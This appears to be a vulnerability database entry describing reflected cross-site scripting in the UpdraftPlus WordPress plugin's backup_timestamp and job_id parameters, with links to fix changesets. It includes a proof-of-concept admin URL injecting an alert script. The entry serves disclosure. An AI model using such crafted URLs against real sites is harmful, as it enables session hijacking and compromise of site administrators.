EPSS
Percentile
38.3%
The plugin does not sanitise and escape the backup_timestamp and job_id parameter before outputting then back in admin pages, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/options-general.php?page=updraftplus&backup;_timestamp=<script>alert(/XSS/)%3B<%2Fscript>&action;=updraft_restore
plugins.trac.wordpress.org/changeset/2635585/updraftplus
plugins.trac.wordpress.org/changeset/2637112/updraftplus